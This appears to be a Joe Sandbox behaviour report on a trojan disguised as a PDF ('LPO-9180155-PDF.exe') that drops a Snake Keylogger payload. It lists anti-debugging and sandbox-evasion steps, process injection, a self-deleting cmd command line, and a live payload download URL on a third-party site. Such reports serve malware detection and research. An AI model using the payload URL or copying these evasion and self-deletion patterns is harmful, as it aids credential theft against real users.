Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -594828s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -594703s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -594578s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -594468s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -594359s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe TID: 2968	Thread sleep time: -594249s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe	Code function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405770
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe	Code function: 0_2_0040622B FindFirstFileW,FindClose,	0_2_0040622B
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe	Code function: 0_2_0040276E FindFirstFileW,	0_2_0040276E
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Code function: 6_2_0040276E FindFirstFileW,	6_2_0040276E
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Code function: 6_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	6_2_00405770
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Code function: 6_2_0040622B FindFirstFileW,FindClose,	6_2_0040622B

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 599199	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 599093	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 598874	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 598765	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 598653	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 598530	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 598421	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 598303	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 598187	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 598078	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 597959	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 597843	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 597734	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 597624	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 597515	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 597406	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 597294	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 597184	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 597077	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 596965	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 596859	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 596749	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 596639	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 596421	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 596201	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 596093	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 595874	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 595765	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 595656	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 595537	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 595421	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 595312	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 595193	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 595068	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 594468	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 594359	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread delayed: delay time: 594249	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\forgrovelse\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior

Source: Forbundsstater.exe, 00000006.00000002.2662544799.000000000554E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx
Source: Forbundsstater.exe, 00000006.00000002.2662544799.00000000055A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Forbundsstater.exe, 00000006.00000002.2675832398.0000000023E34000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: Forbundsstater.exe, 00000006.00000002.2662544799.0000000005589000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWL

Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe	API call chain: ExitProcess graph end node			graph_0-3516
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe	API call chain: ExitProcess graph end node			graph_0-3515

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe

Code function: 6_2_004062BE LdrInitializeThunk,WideCharToMultiByte,GetProcAddress,

6_2_004062BE

Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe

Code function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406252

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe base: 1700000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe base: 19FFF4			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe "C:\Users\user\AppData\Local\Temp\Forbundsstater.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\Forbundsstater.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe

Code function: 0_2_00405F0A GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00405F0A

Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 00000006.00000002.2674791850.0000000021461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Forbundsstater.exe PID: 7032, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 00000006.00000002.2674791850.0000000021461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Forbundsstater.exe PID: 7032, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	111 Process Injection	1 Masquerading	OS Credential Dumping	311 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Clipboard Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 PowerShell	Logon Script (Windows)	Logon Script (Windows)	141 Virtualization/Sandbox Evasion	Security Account Manager	141 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	3 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	115 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
LPO-9180155-PDF.exe	34%	ReversingLabs	Win32.Trojan.Generic

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\Forbundsstater.exe	34%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Label
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33$	0%	URL Reputation	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
http://reallyfreegeoip.org	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
http://checkip.dyndns.com	0%	URL Reputation	safe
http://nsis.sf.net/NSIS_ErrorError	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe
https://www.reap.skyestates.com.mt/	0%	Avira URL Cloud	safe
https://aka.ms/pscore6lBeq	0%	Avira URL Cloud	safe
https://www.reap.skyestates.com.mt/wp-includes/IoNHObzRr183.bino	0%	Avira URL Cloud	safe
https://www.reap.skyestates.com.mt/wp-includes/IoNHObzRr183.bin	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.reap.skyestates.com.mt	108.167.181.251	true	false	unknown
reallyfreegeoip.org	188.114.97.3	true	true	unknown
checkip.dyndns.com	132.226.247.73	true	false	unknown
checkip.dyndns.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://www.reap.skyestates.com.mt/wp-includes/IoNHObzRr183.bin	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.2542661803.0000000005B28000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000002.00000002.2539524436.0000000004C16000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33$	Forbundsstater.exe, 00000006.00000002.2674791850.00000000215C3000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.000000002160C000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.0000000021566000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.00000000215B6000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.000000002161A000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.00000000215D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000002.00000002.2539524436.0000000004C16000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/pscore6lBeq	powershell.exe, 00000002.00000002.2539524436.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000002.00000002.2542661803.0000000005B28000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.2542661803.0000000005B28000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 00000002.00000002.2542661803.0000000005B28000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://reallyfreegeoip.org	Forbundsstater.exe, 00000006.00000002.2674791850.00000000215C3000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.000000002160C000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.000000002153B000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.00000000215B6000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.000000002161A000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.00000000215D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000002.00000002.2542661803.0000000005B28000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org	Forbundsstater.exe, 00000006.00000002.2674791850.00000000215C3000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.000000002160C000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.0000000021566000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.00000000215B6000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.000000002161A000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.0000000021523000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.00000000215D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.reap.skyestates.com.mt/	Forbundsstater.exe, 00000006.00000002.2662544799.0000000005589000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.reap.skyestates.com.mt/wp-includes/IoNHObzRr183.bino	Forbundsstater.exe, 00000006.00000002.2662544799.0000000005589000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org	Forbundsstater.exe, 00000006.00000002.2674791850.00000000215C3000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.000000002160C000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.0000000021566000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.00000000215B6000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.00000000215EC000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.000000002161A000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.0000000021517000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.0000000021523000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.00000000215D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.com	Forbundsstater.exe, 00000006.00000002.2674791850.00000000215C3000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.000000002160C000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.00000000215B6000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.000000002161A000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.0000000021523000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.00000000215D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	LPO-9180155-PDF.exe, Forbundsstater.exe.2.dr	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.2539524436.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.0000000021461000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000002.00000002.2539524436.0000000004C16000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/	Forbundsstater.exe, 00000006.00000002.2674791850.0000000021523000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.114.97.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
108.167.181.251	www.reap.skyestates.com.mt	United States	46606	UNIFIEDLAYER-AS-1US	false
132.226.247.73	checkip.dyndns.com	United States	16989	UTMEMUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1481498
Start date and time:	2024-07-25 10:12:13 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	LPO-9180155-PDF.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@11/12@3/3
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 92% Number of executed functions: 134 Number of non-executed functions: 109
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
